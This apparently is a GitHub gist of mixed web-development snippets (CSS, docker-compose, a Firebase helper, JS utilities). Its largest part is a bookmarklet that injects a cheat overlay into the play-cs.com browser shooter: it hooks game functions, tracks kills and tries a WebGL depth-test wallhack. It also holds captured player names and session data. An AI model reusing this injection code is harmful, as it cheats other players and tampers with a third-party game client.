Skip to content

Instantly share code, notes, and snippets.

@jeff-silva
Last active March 26, 2024 14:44
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save jeff-silva/12b8eb3be2ec7ec5efa14529ed684619 to your computer and use it in GitHub Desktop.
Save jeff-silva/12b8eb3be2ec7ec5efa14529ed684619 to your computer and use it in GitHub Desktop.
snippets

display: flex; align-items: center; justify-content: center;

transition: all 300ms ease;

background: repeating-linear-gradient(90deg, transparent 0, transparent 8.33%, #a2d1ff63 0, #a2d1ff63 16.66%); background-size: 100% 100px; outline: solid 1px #a2d1ff63;

height: calc(3em + 10px); -webkit-line-clamp: 3; overflow: hidden; text-overflow: ellipsis; display: -webkit-box; -webkit-box-orient: vertical;

/* https://vuetifyjs.com/en/features/display-and-platform/#component-mobile-breakpoints */
@media (min-width: 0) and (max-width: 600px) {/* xs: Small to large phone */}
@media (min-width: 600px) and (max-width: 960px) {/* sm: Small to medium tablet */}
@media (min-width: 960px) and (max-width: 1280px) {/* md: Large tablet to laptop */}
@media (min-width: 1280px) and (max-width: 1920px) {/* lg: Laptop to desktop */}
@media (min-width: 1920px) and (max-width: 2560px) {/* xl: 1080p to 1440p desktop */}
@media (min-width: 2560px) {/* xxl: 4k and ultra-wide */}
# docker-compose up --build --force-recreate --remove-orphans
version: '3.7'
services:
app:
image: node:18.16-alpine
working_dir: /app
ports:
- '${NUXT_PORT:-3000}:${NUXT_PORT:-3000}'
volumes:
- '.:/app'
- '/app/node_modules'
environment:
- NODE_ENV=development
- CHOKIDAR_USEPOLLING=true
- HOST=${NUXT_HOST:-0.0.0.0}
- PORT=${NUXT_PORT:-3000}
command: sh -c "yarn install && yarn dev"
// yarn add -D firebase
import * as fireApp from "firebase/app";
import * as fireAuth from "firebase/auth";
import * as fireFirestore from "firebase/firestore";
import * as fireStorage from "firebase/storage";
const config = useRuntimeConfig();
fireApp.initializeApp(config.public.firebase);
export default class {
static async getData() {
const auth = fireAuth.getAuth();
const fireFirestoreDB = fireFirestore.getFirestore();
return {
config,
auth,
fireApp,
fireAuth,
fireFirestore,
fireFirestoreDB,
fireStorage,
};
}
// static async userCreate() {}
// static async userUpdate() {}
// static async userLogin() {}
// static async userLogout() {}
static async firestoreSave(collection, data = {}) {
data = { uid: null, name: "", ...data };
const { fireFirestore, fireFirestoreDB } = await this.getData();
const ref = fireFirestore.collection(fireFirestoreDB, collection);
if (!data.uid) {
const created = await fireFirestore.addDoc(ref, data);
data.uid = created.id;
}
if (data.uid) {
await fireFirestore.setDoc(
fireFirestore.doc(fireFirestoreDB, collection, data.uid),
data
);
}
await fireFirestore.setDoc(
fireFirestore.doc(fireFirestoreDB, collection, data.uid),
data
);
return data;
}
static async firestoreFind(collection, find, by = "uid") {
const { fireFirestore, fireFirestoreDB } = await this.getData();
const docRef = fireFirestore.doc(fireFirestoreDB, collection, find);
const docSnap = await fireFirestore.getDoc(docRef);
return docSnap.exists() ? docSnap.data() : false;
}
static async firestoreSearch(collection, query = {}) {
query = {
limit: 5,
// orderBy: ["uid", "desc"],
// where: [],
startAfter: false,
endAt: false,
...query,
};
let prev = false;
let next = false;
const { fireFirestore, fireFirestoreDB } = await this.getData();
const collectRef = fireFirestore.collection(fireFirestoreDB, collection);
let queryArgs = [];
if (query.orderBy) {
queryArgs.push(fireFirestore.orderBy.apply(null, query.orderBy));
}
// if (query.where.length > 0) {
// query.where.map((condition) => {
// queryArgs.push(fireFirestore.where.apply(null, condition));
// });
// }
if (query.startAfter) {
queryArgs.push(
fireFirestore.startAfter(
await fireFirestore.getDoc(
fireFirestore.doc(fireFirestoreDB, collection, query.startAfter)
)
)
);
}
if (query.endAt) {
queryArgs.push(
fireFirestore.endAt(
await fireFirestore.getDoc(
fireFirestore.doc(fireFirestoreDB, collection, query.endAt)
)
)
);
}
if (query.limit) {
queryArgs.push(fireFirestore.limit(query.limit));
}
const docsQuery = fireFirestore.query.apply(null, [
collectRef,
...queryArgs,
]);
const docs = await fireFirestore.getDocs(docsQuery);
let data = [];
docs.forEach((doc) => {
data.push({ ...doc.data(), uid: doc.id });
});
if (data.length == query.limit) {
next = JSON.parse(JSON.stringify(query));
next.startAfter = data[data.length - 1]["uid"];
next.endAt = false;
}
return { query, data, prev, next };
}
static async firestoreDelete(collection, uid) {
const { fireFirestore, fireFirestoreDB } = await this.getData();
const itemRef = fireFirestore.doc(fireFirestoreDB, collection, uid);
return await fireFirestore.deleteDoc(itemRef);
}
static async realtimeSave() {}
static async realtimeFind() {}
static async realtimeSearch() {}
static async realtimeDelete() {}
static async storageSave(data, file = null) {
data = { uid: false, name: "", size: "", type: "", ...data };
const { fireStorage } = await this.getData();
const storage = fireStorage.getStorage();
const fileRef = fireStorage.ref(storage, data.name);
fireStorage.uploadBytes(fileRef, file);
console.log(data, file);
}
static async storageFind() {}
static async storageSearch() {}
static async storageDelete() {}
}
// ==UserScript==
// @name Test
// @namespace http://tampermonkey.net/
// @version 2024-03-15
// @description try to take over the world!
// @author You
// @match **://**/**
// @icon https://www.google.com/s2/favicons?sz=64&domain=undefined.localhost
// @grant none
// ==/UserScript==
(function() {
'use strict';
const createElement = (param) => {
return new Promise(async (resolve, reject) => {
if (typeof param=='object' && !Array.isArray(param)) {
const options = {
tag: 'div',
appendTo: null,
onLoadAll: () => null,
...param,
};
const el = Object.assign(document.createElement(options.tag), options);
if (options.appendTo) options.appendTo.appendChild(el);
return resolve({ el, options });
}
else if (Array.isArray(param)) {
const all = await Promise.all(
param.map(async (options) => {
return new Promise(async (resolve, reject) => {
const data = await createElement(options);
['iframe', 'link', 'script'].includes(data.options.tag) ?
data.el.addEventListener('load', (ev) => resolve({ ev, ...data })):
resolve({ ev: null, ...data });
});
})
);
all.map((item) => {
item.options.onLoadAll({ item, all });
});
resolve(all);
}
resolve(false);
});
};
(async () => {
const { el: iframe } = await createElement({
appendTo: document.body,
tag: 'iframe',
src: 'about:blank',
style: `position:fixed; bottom:0; right:0; z-index:999; border: solid 1px red;`,
});
await createElement([
{
tag: 'script',
appendTo: iframe.contentDocument.body,
src: 'https://unpkg.com/vue@3.4.21/dist/vue.global.js',
},
{
tag: 'script',
appendTo: iframe.contentDocument.body,
src: 'https://unpkg.com/vuetify@3.5.11/dist/vuetify.js',
},
{
tag: 'div',
appendTo: iframe.contentDocument.body,
style: `display: none;`,
innerHTML: `<div>
Hello {{ hello }} <br />
<input type="text" v-model="hello" />
</div>`,
onLoadAll({ item }) {
item.el.style.display = 'block';
const { Vue } = iframe.contentWindow;
Vue.createApp({
data() {
return {
hello: 'World',
};
},
}).mount(item.el);
},
}
]);
})();
})();
document.body.append(Object.assign(document.createElement('div'), {
innerHTML: `<div>Hello</div>`,
}));
const gaussCurve = (numPoints, maxValue, mean) => {
const points = [];
const standardDeviation = maxValue / 3;
for (let i = 0; i < numPoints; i++) {
const x = (i / (numPoints - 1)) * (maxValue * 2) - maxValue;
const y = (1 / (standardDeviation * Math.sqrt(2 * Math.PI))) * Math.exp(-(Math.pow(x - mean, 2) / (2 * Math.pow(standardDeviation, 2))));
points.push(y);
}
const maxPointValue = Math.max(...points);
const scaleFactor = maxValue / maxPointValue;
const scaledPoints = points.map((value) => value * scaleFactor);
return scaledPoints.map(n => Math.round(n));
}
let assets = [
{tag:"script", src:"https://unpkg.com/vue@2.6.14/dist/vue.min.js"},
{tag:"link", href:"https://unpkg.com/bootstrap@5.1.1/dist/css/bootstrap.min.css", rel:"stylesheet"},
{tag:"link", href:"https://unpkg.com/animate.css@4.1.1/animate.min.css", rel:"stylesheet"},
];
assets = assets.map((asset, index) => {
return new Promise((resolve, reject) => {
document.body.appendChild(Object.assign(document.createElement(asset.tag), asset, {
onload: ev => { resolve(); },
}));
});
});
Promise.all(assets).then(resp => {
console.log('tudo carregado', Vue);
});
const numberFormat = (number, params) => {
params = {
decs: 2, // Decimals
dsep: ',', // Decimal separator
tsep: '.', // Thousand separator
padStart: 0,
padStartStr: '',
...params
};
let [ n1, n2 ] = parseFloat(number).toFixed(params.decs).split('.');
n1 = n1.split('').reverse().join('').replace(/(\d{3})/g, `$1${params.tsep}`).split('').reverse().join('');
return [n1, params.decs>0? n2: null]
.filter(value => !!value)
.join(params.dsep)
.replace(new RegExp(`^\\${params.tsep}`, 'g'), '')
.padStart(params.padStart, params.padStartStr)
};
window.scrollTo({
top: document.body.scrollHeight,
behavior: 'smooth',
});
document.querySelector('#element').scrollIntoView({
behavior: 'smooth',
block: 'end',
});
const uuid = function(prefix='node-', format='xxxxxxxxxx') {
return prefix+format.replace(/[xy]/g, function(c) {
var r = Math.random() * 16 | 0, v = c == 'x' ? r : (r & 0x3 | 0x8);
return v.toString(16);
});
};
let picker = wp.media({
title: 'Add to Gallery',
button: {text: 'Select'},
multiple: false,
});
picker.open();
picker.on('select', () => {
let file = picker.state().get('selection').first().toJSON();
console.log(file);
});
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<!--
canvas = Module.canvas
[15:08:05] UpdR 13 -337 618 1 (date, cmd, usernum, x, y, color)
Trocar time:
Module._ChangeTeamJS(team)
team: 0=unassigned, 1=terrorist, 2=ct, 3=spectator
Module._DrawZAxisJS2(10) (?)
Module._MsgFunc_HealthJS: Informa saúde: 0~100
Module._MsgFunc_SetFOVJS: altera FOV (field of view)
Module._ChangeFOVJS: altera FOV (field of view)
-->
<template id="pcsh-template">
<div v-if="run" style="text-align:left;">
<v-app>
<!-- Mira -->
<div style="
position: fixed;
top: calc(50% - 0.5px);
left: calc(50% - 0.5px);
background: lime;
box-sizing: border-box;
display: block;
width: 2px;
height: 3px;
z-index: 999;
">&nbsp;</div>
<!-- Magnifier -->
<canvas
id="pcsh-magnifier"
width="100px"
height="100px"
style="
display: block !important;
position: fixed;
top: calc(50% - 50px);
right: 10px;
width: 100px;
height: 100px;
border: solid 1px lime;
z-index: 999 !important;
"
></canvas>
<!-- Deaths -->
<div style="position:fixed; bottom:5px; left:5px; width:300px; z-index:9999;">
<transition-group>
<template v-for="(d, i) in deaths.filter(d => d.killer.me==true)">
<v-alert dense color="success" rounded="0" icon="mdi-pistol" class="ma-0">
<div class="d-flex">
<div class="flex-grow-1">{{ d.victim.name }}</div>
<div>{{ d.weapom }}</div>
</div>
</v-alert>
</template>
</transition-group>
<transition-group>
<template v-for="(d, i) in deaths.filter(d => d.victim.me==true)">
<v-alert :key="d.id" dense color="error" rounded="0" icon="mdi-skull" class="ma-0">
<div class="d-flex">
<div class="flex-grow-1">{{ d.killer.name }}</div>
<div>{{ d.weapom }}</div>
</div>
</v-alert>
</template>
</transition-group>
</div>
<!-- Window -->
<app-window wid="default" :pos="{x:5, y:210, w:300, h:600}">
<div class="d-flex flex-column" style="height:100%;">
<v-alert v-bind="myInfo.level.bind" class="ma-0" rounded="0">
Aproveitamento: {{ myInfo.level.value }} <br />
Matou {{ myInfo.player.frags }}, morreu {{ myInfo.player.deaths }}
</v-alert>
<!-- Table -->
<div class="flex-grow-1" style="overflow:auto;">
<v-simple-table dense fixed-header>
<template #default>
<thead>
<tr>
<th class="text-left">Top killers</th>
<th class="text-left" style="width:20px!important;" title="I Killed">IK</th>
<th class="text-left" style="width:20px!important;" title="Killed Me">KM</th>
<th class="text-left" style="width:20px!important;">Kills</th>
<!-- <th class="text-left" style="width:20px!important;">Kick</th> -->
</tr>
</thead>
<tbody>
<tr
v-for="p in playersArr"
:key="p.name"
:class="`teamnumber-${p.teamnumber} me-${p.me}`"
>
<td>
<a :href="`https://play-cs.com/rating/search/${p.name}`" target="_blank" style="text-decoration:none; color:#222;">
{{ p.name }}
</a>
</td>
<td style="font-weight:bold; color:green;">{{ p.iKilled }}</td>
<td style="font-weight:bold; color:#aa0000;">{{ p.killedMe }}</td>
<td style="font-weight:bold;">{{ p.frags }}</td>
<!-- <td>
<v-btn x-small icon @click="playerKick(p)">
<v-icon>
mdi-account-cancel
</v-icon>
</v-btn>
</td> -->
</tr>
</tbody>
</template>
</v-simple-table>
</div>
<v-card-actions class="d-flex align-center">
<v-btn small @click="appStop()">Fechar</v-btn>
<v-spacer></v-spacer>
<v-switch
label="Depth test (E)"
:value="depthTest"
disabled
class="my-0 mx-2"
:hide-details="true"
></v-switch>
</v-card-actions>
</div>
</app-window>
</v-app>
</div>
</template>
<script>
const injectScript = () => {
if (typeof window.pcshVue!='undefined') {
return window.pcshVue.appToggle();
}
let assets = [
{tag:"script", src:"https://unpkg.com/vue@2.6.14/dist/vue.min.js"},
{tag:"script", src:"https://unpkg.com/vuetify@2/dist/vuetify.min.js"},
{tag:"link", href:"https://unpkg.com/vuetify@2/dist/vuetify.min.css", rel:"stylesheet"},
{tag:"link", href:"https://unpkg.com/@mdi/font/css/materialdesignicons.min.css", rel:"stylesheet"},
{tag:"link", href:"https://unpkg.com/animate.css@4.1.1/animate.min.css", rel:"stylesheet"},
{tag:"script", src:"https://unpkg.com/vue-drag-resize@1.5.4/dist/index.js"},
];
assets = assets.map((asset, index) => {
return new Promise((resolve, reject) => {
document.body.appendChild(Object.assign(document.createElement(asset.tag), asset, {
onload: ev => { resolve(); },
}));
});
});
Promise.all(assets).then(resp => {
const root = Object.assign(document.createElement('div'), {
innerHTML: '{pcsh-template}',
});
document.body.append(Object.assign(document.createElement('style'), {
innerHTML: `
.v-application--wrap {
min-height: auto;
}
.v-application ::-webkit-scrollbar {width:5px; height:5px;}
.v-application ::-webkit-scrollbar-thumb {background:#888;}
tr.me-true {background: #d31313a6 !important;}
tr.teamnumber-1 {background: #00ff0022;}
tr.teamnumber-2 {background: #00000066;}
`,
}));
Vue.component('app-window', {
components: { VueDragResize: window.VueDragResize.default },
props: {
wid: {
type: [String, Boolean],
default: false,
},
pos: {
type: Object,
default: () => ({}),
},
},
data() {
let wid = this.wid? `app-window-${this.wid}`: false;
let bind = this.validPos();
if (this.wid) {
bind = this.validPos(JSON.parse(localStorage.getItem(this.wid) || '{}'));
}
return { wid, bind };
},
methods: {
storePos(params) {
if (!this.wid) return;
this.bind = this.validPos({
x: params.left,
y: params.top,
w: params.width,
h: params.height,
});
localStorage.setItem(this.wid, JSON.stringify(this.bind));
},
validPos(pos={}) {
let defaultPos = {
...{x:0, y:0, w:300, h:400},
...this.pos,
};
return { ...defaultPos, ...pos };
},
},
template: `<vue-drag-resize v-bind="bind" @resizing="storePos" @dragging="storePos" style="background:#ffffffdd; z-index:99999!important;">
<slot />
</vue-drag-resize>`,
});
document.body.prepend(root);
window.pcshVue = new Vue({
el: root,
vuetify: new Vuetify(),
data: {
run: true,
depthTest: false,
canvas: false,
playersObj: {},
deaths: [],
canvas: false,
},
computed: {
playersArr() {
return Object.values(this.playersObj)
.filter(player => !!player.name)
.map(this.playerDefault)
.sort((a, b) => {
a.frags = parseInt(a.frags) || 0;
b.frags = parseInt(b.frags) || 0;
if (a.frags > b.frags) { return -1; }
if (a.frags < b.frags) { return 1; }
return 0;
});
},
myInfo() {
const player = this.playerMe();
let level = !player? {}: {
value: (parseInt(player.frags) - parseInt(player.deaths)),
bind: {color: 'warning'},
};
if (player && level.value <= 1) {
level.bind.color = 'error';
}
if (level.value > 5) {
level.bind.color = 'success';
}
return { level, player };
},
},
methods: {
depthTestRun() {
if (!this.depthTest) return;
let { canvas } = this;
if (canvas) {
let gl = canvas.getContext('webgl');
gl.enable(gl.DEPTH_TEST);
gl.depthFunc(gl.NEVER);
}
},
playerMe() {
return this.playersObj[ CS_ENV.myXashId ] || false;
},
playersList() {
let playersObj = {};
if (typeof g_PlayerExtraInfo=='object') {
for(let i in g_PlayerExtraInfo) {
let playerObj = playersObj[i] || {};
playerObj = { ...playerObj, ...g_PlayerExtraInfo[i] };
playersObj[i] = this.playerDefault(playerObj);
}
/*Script para remover keys fora da lista, remover usuários inexistentes*/
}
this.playersObj = playersObj;
},
playerKick(player) {
if (typeof Module=='undefined') return;
Module.pfnClientCmd("votekick");
},
playerDefault(player) {
player.me = player.name==CS_ENV.my_cvars.name;
player.iKilled = player.iKilled || 0;
player.killedMe = player.killedMe || 0;
return player;
},
playerXashId(player) {
for(let i in this.playersObj) {
if (player.name == this.playersObj[i].name) {
return i;
}
}
return false;
},
deathsAdd(death) {
if (death.killer.name!=CS_ENV.my_cvars.name && death.victim.name!=CS_ENV.my_cvars.name) {
return;
}
death = {
id: Math.round(Math.random()*99999),
killer: false,
victim: false,
headshot: false,
weapom: false,
me: true,
...death
};
if (death.killer.me) {
let xashId = this.playerXashId(death.victim);
this.playersObj[ xashId ].iKilled += 1;
}
if (death.victim.me) {
let xashId = this.playerXashId(death.killer);
this.playersObj[ xashId].killedMe += 1;
}
this.deaths.unshift(death);
if (this.deaths.length > 3) {
this.deaths.pop();
}
},
messageSend(text, team=false) {
Module.pfnClientCmd([(team? 'say_team': 'say'), text].join(' '));
},
moduleMethod(name, callback) {
if (typeof Module=='undefined') return;
const funcClone = Module[name].bind({});
Module._MsgFunc_DeathMsgJS = (killer, victim, headshot, truncatedWeaponNamePtr) => {
funcClone(killer, victim, headshot, truncatedWeaponNamePtr);
callback();
};
},
moduleMsgFuncDeathMsgReplace() {
if (typeof Module=='undefined') return;
const _MsgFunc_DeathMsgJS = Module._MsgFunc_DeathMsgJS.bind({});
Module._MsgFunc_DeathMsgJS = (killer, victim, headshot, truncatedWeaponNamePtr) => {
_MsgFunc_DeathMsgJS(killer, victim, headshot, truncatedWeaponNamePtr);
killer = this.playerDefault(g_TeamInfo[killer] || {});
victim = this.playerDefault(g_TeamInfo[victim] || {});
let weapom = Pointer_stringify(truncatedWeaponNamePtr);
this.deathsAdd({ killer, victim, headshot, weapom });
};
},
modulePrintReplace() {
if (typeof Module=='undefined') return;
const modulePrint = Module.print.bind({});
Module.print = (text) => {
modulePrint(text);
searchCB(text, "UpdR", () => {
console.error('UpdR:', text);
});
};
},
canvasMagnifierInit() {
if (typeof Module=='undefined') return;
console.log(Module.canvas);
/*if (this.players.length==0) return;
let { canvas } = this;
if (!canvas) return;
let magnifier = document.querySelector('#pcsh-magnifier');
let magnifierCtx = canvas.getContext('2d');
magnifierCtx.drawImage(canvas, 0, 0);*/
},
appInit() {
if (!this.canvas) {
this.canvas = document.querySelector('#canvas');
}
this.run = setInterval(() => {
this.playersList();
this.depthTestRun();
}, 10);
document.addEventListener('keydown', ev => {
if (!['E', 'e'].includes(ev.key)) return;
this.depthTest = true;
});
document.addEventListener('keyup', ev => {
if (!['E', 'e'].includes(ev.key)) return;
this.depthTest = false;
});
document.addEventListener('keydown', ev => {
if (!['F', 'f'].includes(ev.key)) return;
Module.pfnClientCmd("amxmodmenu");
goPointerlock();
});
},
appStop() {
clearInterval(this.run);
this.run = false;
},
appToggle() {
this.run? this.appStop():
this.appInit();
},
},
mounted() {
this.appInit();
this.moduleMsgFuncDeathMsgReplace();
this.modulePrintReplace();
this.canvasMagnifierInit();
},
});
});
};
// Tests:
// Death message test
(() => {
setInterval(() => {
if (!window.pcshVue) return;
const me = window.pcshVue.playerMe();
const random = window.pcshVue.playersArr[Math.floor(Math.random()*window.pcshVue.playersArr.length)];
const bool = Math.random() < 0.5;
const death = {
killer: (bool ? me : random),
victim: (bool ? random : me),
headshot: Math.random() < 0.5,
weapom: 'd_knife',
};
if (!death.killer || !death.victim) return;
window.pcshVue.deathsAdd(death);
}, 500);
})();
let injectLink = injectScript.toString()
.replace('{pcsh-template}', document.querySelector('#pcsh-template').innerHTML)
.replace(/\/\*.+?\*\//g, '')
.replace(/\<\!--.+?--\>/g, '')
.replace(/\n\s*/g, '');
injectLink = `javascript:(${injectLink})();`;
// console.log(injectLink);
document.body.append(Object.assign(document.createElement('a'), {
id: 'pcsh-book',
href: injectLink,
innerHTML: `pcsh`,
style: `background:#fff; color:#444; display:inline-block; padding:10px 20px; margin:10px; border-radius:8px; text-decoration:none; background:#ddd; float:right;`,
}));
document.querySelector('#pcsh-book').click();
// d_knife
let g_PlayerExtraInfo = {
"111112e1faeb763cd92dac974cf9f7": {
"name": "Player 32180847",
"frags": "9",
"deaths": "9",
"teamnumber": 2,
"status": "",
"skill": 1032.78,
"rank": "-",
"country": "br",
"id": "1",
"perks": [],
"level": "",
"ping": "260",
"premium": false
},
"11111ee73eee48ae6912bce9122885": {
"name": "Player 32189693",
"frags": "4",
"deaths": "9",
"teamnumber": 1,
"status": "Dead",
"skill": 199.28,
"rank": "-",
"country": "ru",
"id": "2",
"perks": [],
"level": "",
"ping": "256",
"premium": false
},
"11111d9fdd48fa6c59f2df340cb147": {
"name": "Player 32191171",
"frags": "0",
"deaths": "1",
"status": "",
"skill": 50,
"rank": "-",
"country": "xx",
"id": "3",
"perks": [],
"level": "",
"ping": "941",
"teamnumber": 1,
"premium": false
},
"111114d52aecc32111b94ff9defbb2": {
"name": "Player 31920358",
"frags": "8",
"deaths": "9",
"teamnumber": 2,
"status": "Dead",
"skill": 1360.74,
"rank": "-",
"country": "az",
"id": "4",
"perks": [],
"level": "",
"ping": "270",
"premium": false
},
"111119b3493140d010f19f20f6d03b": {
"name": "Player 31988314",
"frags": "13",
"deaths": "10",
"teamnumber": 2,
"status": "",
"skill": 987.78,
"rank": "-",
"country": "gb",
"id": "5",
"perks": [],
"level": "",
"ping": "222",
"premium": false
},
"111112185c5c66cb9abc981278059f": {
"name": "Player 32191180",
"frags": "0",
"deaths": "11",
"teamnumber": 2,
"status": "",
"skill": 50,
"rank": "-",
"country": "xx",
"id": "6",
"perks": [],
"level": "",
"ping": "295",
"premium": false
},
"ec6a8351575d5021a88dcfc5128726": {
"name": "TunaLP",
"frags": "10",
"deaths": "7",
"teamnumber": 2,
"status": "",
"skill": 50,
"rank": 221976,
"country": "at",
"id": "7",
"perks": [],
"level": "",
"ping": "336",
"premium": false
},
"11111710ce8a5f0aa28f903a901b3e": {
"name": "Player 32190913",
"frags": "12",
"deaths": "10",
"teamnumber": 2,
"status": "",
"skill": 50,
"rank": "-",
"country": "br",
"id": "8",
"perks": [],
"level": "",
"ping": "23",
"premium": false
},
"11111e8411dacd36f185536e8368cd": {
"name": "Player 29939213",
"frags": "10",
"deaths": "11",
"teamnumber": 1,
"status": "",
"skill": 59.37,
"rank": "-",
"country": "br",
"id": "9",
"perks": [],
"level": "",
"ping": "274",
"premium": false
},
"1111179ef4e1a601db61fe8d7e6c8a": {
"name": "Player 31560244",
"frags": "7",
"deaths": "13",
"teamnumber": 1,
"status": "",
"skill": 50,
"rank": "-",
"country": "br",
"id": "10",
"perks": [],
"level": "",
"ping": "143",
"premium": false
},
"1111120b8e8258129e7865b12424a4": {
"name": "Player 32190412",
"frags": "14",
"deaths": "6",
"teamnumber": 1,
"status": "",
"skill": 50,
"rank": "-",
"country": "br",
"id": "11",
"perks": [],
"level": "",
"ping": "34",
"premium": false
},
"73b58b1b7369c6b8ec46e816e8321e": {
"name": "########## ANUS",
"frags": "6",
"deaths": "6",
"teamnumber": 1,
"status": "",
"skill": 4906.34,
"rank": 8204,
"country": "ru",
"id": "12",
"perks": [],
"level": 14,
"ping": "243",
"premium": false
},
"618c1d9aa7da97812c348ea0a8a575": {
"name": "Player 78846943",
"frags": "20",
"deaths": "7",
"teamnumber": 2,
"status": "",
"skill": 10579.51,
"rank": 4933,
"country": "br",
"id": "13",
"perks": [],
"level": 18,
"ping": "58",
"premium": false
},
"fa7fe063805e8eb06869e989bbb6b1": {
"name": "Player 75221957",
"frags": "1",
"deaths": "5",
"teamnumber": 2,
"status": "",
"skill": 2380.79,
"rank": 11828,
"country": "xx",
"id": "14",
"perks": [],
"level": 4,
"ping": "48",
"premium": false
},
"41267939e1b88cf2e07604e67e7d43": {
"name": "_____SOVIET",
"frags": "2",
"deaths": "1",
"status": "",
"skill": 52.01,
"rank": 151629,
"country": "br",
"id": "15",
"perks": [],
"premium": false,
"ping": "-",
"level": "",
"teamnumber": 1
},
"83c63f92090b33fe9d3aeb8dcc8285": {
"name": "MendigoPegador",
"frags": "14",
"deaths": "9",
"teamnumber": 1,
"status": "",
"skill": 5760.67,
"rank": 7293,
"country": "xx",
"id": "16",
"perks": [],
"level": 14,
"ping": "42",
"premium": false
},
"11111ba0ffb61e93e67c628643c40d": {
"name": "Player 31341885",
"frags": "9",
"deaths": "14",
"teamnumber": 1,
"status": "",
"skill": 52.19,
"rank": "-",
"country": "al",
"id": "17",
"perks": [],
"level": "",
"ping": "274",
"premium": false
}
};
let CS_ENV = {
"role": "user",
"server_owner": "VINIX",
"server_owner_id": 1120125,
"request_region": "br",
"MDL1_VERSION": 34,
"BSP_VERSION": 4,
"MAPFILES_VERSION": 5,
"CVARS_VERSION": 2,
"SND1_VERSION": 17,
"WAD_VERSION": 29,
"memory": 300,
"materials_txt_version": 15,
"SKY_VERSION": 23,
"XASH_MEM": 3,
"GFX_WAD_VERSION": 6,
"CLIENT_VERSION": 56,
"sentences_txt_version": 6,
"DECALS_WAD_VERSION": 38,
"admin": false,
"perks_icons": [],
"perks_info": {
"1": {
"perk_icon": "HE",
"perk_id": 1,
"team_limit": 0
},
"2": {
"perk_icon": "AR",
"perk_id": 2,
"team_limit": 0
},
"4": {
"perk_icon": "SM FL",
"perk_id": 4,
"team_limit": 0
},
"8": {
"perk_icon": "KT",
"perk_id": 8,
"team_limit": 2
},
"16": {
"perk_icon": "DE",
"perk_id": 16,
"team_limit": 0
}
},
"CDN_BASE": "//cdn.play-cs.com",
"skipCDN": false,
"ORIGIN": "play-cs.com",
"LOAD_MODULE_NAME": "game_client",
"LOAD_MODULE_URL": "//cdn.play-cs.com/js/client.js?v=56",
"XASH_URL": "/js/xash.wss.js",
"wsproxy": "undefined",
"XASH_MEMFILE_URL": "https://cdn.play-cs.com/xash.html.mem?v=3",
"request_map": "fy_iceworld",
"auto_chooseteam": false,
"aPlayersModelList": [],
"myXashId": "41267939e1b88cf2e07604e67e7d43",
"my_cvars": {
"name": "_____SOVIET",
"blood": "0",
"gamma": "5",
"hand2": "1",
"decals": "0",
"volume": "0.8",
"fps_max": "999",
"m_pitch": "0.022",
"ct_model": "5",
"feedback": "1",
"tr_model": "5",
"vid_mode": "",
"sensivity": "3",
"cl_weather": "0",
"fireinhole": "1",
"chat_enable": "1",
"cl_bobcycle": "0.8",
"motd_enable": "1",
"sensitivity": "3",
"canvas_width": "100",
"cl_minmodels": "1",
"country_hide": "0",
"hud_centerid": "0",
"switch_sound": "0",
"notifications": "1",
"statsx_enable": "1",
"inverted-mouse": "0",
"stretch_canvas": "1",
"voice_chat_off": "0",
"r_drawviewmodel": "1",
"net_optimization": "1",
"_cl_autowepswitch": "1",
"cl_crosshair_size": "medium",
"grenadechat_enable": "1",
"cl_dynamiccrosshair": "0",
"resources_dir_sounds": "/rez/",
"resources_dir_players": "/rez/",
"resources_dir_weapons": "/rez/",
"wheel_jump_everywhere": "0",
"zoom_sensitivity_ratio": "1.2",
"cl_crosshair_translucent": "0"
},
"resources_dir": "/rez/",
"resources_dir_players": "/rez/",
"resources_dir_weapons": "/rez/",
"resources_dir_sounds": "/rez/",
"gamemode": "fy",
"sound_list": "soundList.json",
"model_list": "modelList.json",
"port": 27006,
"server_name": "ICEWORLD FUN !!!!",
"server_ranked": true,
"votekick": true,
"for_rent": true,
"loading_text": "Fight/Yard",
"loading_desc": "Kill all enemies with any weapon on map.",
"fileListUpdate": {
"models/knives/p_80_knife.mdl": 36,
"models/v_usp.mdl": 39,
"models/knives/v_30_knife.mdl": 35,
"models/KOHTPA/vts_sumka.mdl": 40,
"models/zm_darkcity/car_vanB01.mdl": 35,
"models/knives/p_30_knife.mdl": 35,
"sprites/blood.spr": 35,
"evil_knife/knife_slash2.wav": 20,
"debris/bustglass2.wav": 2,
"models/mishura/arrow.mdl": 36,
"models/blockmaker/bm_block_invincibility_small.mdl": 36,
"models/blockmaker/bm_block_invincibility_large.mdl": 36,
"models/blockmaker/bm_block_invincibility.mdl": 36,
"35hp_spacedoff_sw.bsp": 6,
"models/man/78rus_icarus.mdl": 35,
"models/man/78rus_truck-zil_gray.mdl": 35,
"models/man/halla_antenna1a.mdl": 35,
"models/man/buzzer_teatp_ladasp.mdl": 35,
"models/man/jed_deciduous_trees01.mdl": 35,
"models/man/78rus_truck-zil_blue.mdl": 35,
"models/man/78rus_truck-zil_yel.mdl": 35,
"models/man/78rus_gazel_02.mdl": 35,
"models/man/prop_met_vanna_01.mdl": 35,
"models/man/78rus_ambulance_01.mdl": 35,
"models/knives/v_80_knife.mdl": 36,
"gfx/env/desbk.tga": 35,
"models/player/sas/sas.mdl": 37,
"models/player/terror/terror.mdl": 37,
"models/player/gign/gign.mdl": 37,
"models/player/vip/vip.mdl": 37,
"models/player/urban/urban.mdl": 37,
"models/player/guerilla/guerilla.mdl": 37,
"models/player/leet/leet.mdl": 37,
"models/player/gsg9/gsg9.mdl": 37,
"models/player/arctic/arctic.mdl": 37,
"models/octoberfest/p_ak47.mdl": 37,
"gfx/env/desft.tga": 35,
"gfx/env/deslf.tga": 35,
"gfx/env/desrt.tga": 35,
"models/p_deagle.mdl": 45,
"sprites/bloodspray.spr": 35,
"/wad/cs_assault_russka/itsitaly.wad": 29,
"/wad/as_core/liquids.wad": 29,
"models/de_Cu6upb/ural-4320.mdl": 35,
"/wad/de_truth_cz/czde_truth.wad": 29,
"/wad/de_fastline_cz/czde_fastline.wad": 29,
"models/p_knife.mdl": 38,
"/wad/cs_assault_russka/hns_cccp.wad": 29,
"models/knives/p_56_knife.mdl": 1,
"models/v_knife.mdl": 38,
"models/props/lantern_paper2.mdl": 35,
"de_crossfire.bsp": 5,
"/wad/fy_msk_centr/_street.wad": 30,
"fy_msk_centr.bsp": 9,
